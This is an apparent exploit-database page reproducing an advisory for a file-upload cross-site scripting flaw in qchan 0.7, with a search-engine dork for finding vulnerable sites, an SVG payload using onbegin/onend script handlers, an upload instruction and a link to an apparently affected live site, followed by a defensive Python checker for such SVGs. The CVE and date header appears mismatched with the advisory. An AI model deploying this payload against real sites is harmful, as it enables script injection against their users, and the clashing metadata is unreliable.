CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-39893 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2017-12-30 |
============================================================================
| # Title     : qchan 0.7 File upload XSS Vulnerability
| # Author    : indoushka
| # email     : [email protected]
| # Tested on : windows 10 Français V.(Pro)
| # Version   : 0.7
| # Vendor    : http://wmscripti.com/
| # Dork      : Powered by Qchan 0.7
============================================================================

poc :

[+] Dorking in Google or other search engine

[+] Save this code as test.svg :

```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <defs>
    <circle id="indoushka" r="50" cx="100" cy="100" style="fill: #F00">
      <set attributeName="fill" attributeType="CSS" onbegin='alert(1)' onend='alert(2)' to="#00F" begin="1s" dur="5s" />
    </circle>
  </defs>
  <use xlink:href="#indoushka"/>
</svg>
```

[+] upload it .

http://shandian.free.yuny.pw/uploads/2017/12/test.svg

Greetz :
----------------------------------------------------------------------------------------
| jericho * Larry W. Cashdollar * shadow0075 * djroot.dz * Gjoko 'LiquidWorm' Krstic |
========================================================================================
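An upload-side check for the active content this PoC relies on, as an added example (not part of the advisory and not qchan's code): it parses an uploaded SVG and reports event-handler attributes, script-bearing elements and script-capable URL schemes. The function and constant names are hypothetical, and the element list is a conservative assumption rather than a complete SVG sanitizer.

```python
import re
import xml.etree.ElementTree as ET

# Elements that run script or embed foreign content inside an SVG (assumed list).
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
SCRIPT_SCHEME = re.compile(r"\s*(javascript|vbscript|data):", re.I)

# Markup of test.svg from the advisory above (whitespace reflowed), as sample input.
ADVISORY_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs> <circle id="indoushka" r="50" cx="100" cy="100" style="fill: #F00">
<set attributeName="fill" attributeType="CSS" onbegin='alert(1)' onend='alert(2)'
     to="#00F" begin="1s" dur="5s" /> </circle> </defs>
<use xlink:href="#indoushka"/> </svg>"""
# Constructed benign sample.
PLAIN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5" cx="9" cy="9"/></svg>'


def local(name):
    """Drop the '{namespace}' prefix ElementTree puts on qualified names."""
    return name.rsplit("}", 1)[-1]


def svg_findings(data):
    """Return reasons an uploaded SVG must not be served inline ([] if none found)."""
    try:
        text = data.decode("utf-8")  # str input makes expat parse as UTF-8 only
    except UnicodeDecodeError:
        return ["not UTF-8"]
    if re.search(r"<!(DOCTYPE|ENTITY)", text, re.I):
        return ["DOCTYPE/ENTITY declaration"]  # refuse DTDs before parsing
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for name, value in el.attrib.items():
            attr, v = local(name), value.lower().strip()
            if attr.lower().startswith("on"):  # onbegin, onend, onload, ...
                findings.append(f"<{tag}> event handler {attr}")
            elif attr in ("href", "src") and SCRIPT_SCHEME.match(value):
                findings.append(f"<{tag}> {attr} with script-capable scheme")
            elif tag in ("set", "animate") and attr == "attributeName" and (v.startswith("on") or v.endswith("href")):
                findings.append(f"<{tag}> animates {value}")
    return findings
```

A non-empty result means the file should be rejected, or served with `Content-Disposition: attachment` and a restrictive `Content-Security-Policy` rather than rendered inline from the application's origin.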
Copyright ©2024 Exploitalert.